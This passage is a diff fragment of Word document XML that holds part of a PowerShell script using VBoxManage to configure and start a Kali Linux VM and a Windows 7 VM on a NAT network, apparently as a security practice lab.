+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 1 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvddrive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\VirtualBox\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxGuestAdditions.iso</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Define boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Start Kali VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>startvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Start-Sleep 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># 3. Create Windows VM for vulnerability) | +- </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>15min</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Register VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>createvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --name $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ostype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'Windows7_64' --register</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Set VM settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cpus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>graphicscontroller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vboxsvga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --nat-network1 $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bidirectional</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add a SATA storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --controller </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>IntelAHCI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --bootable on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add virtual disk to storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storageattach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hdd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'.\VDI\Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 7 Ultimate SP1 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Define boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Start Windows VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>startvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 4. Finish Setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
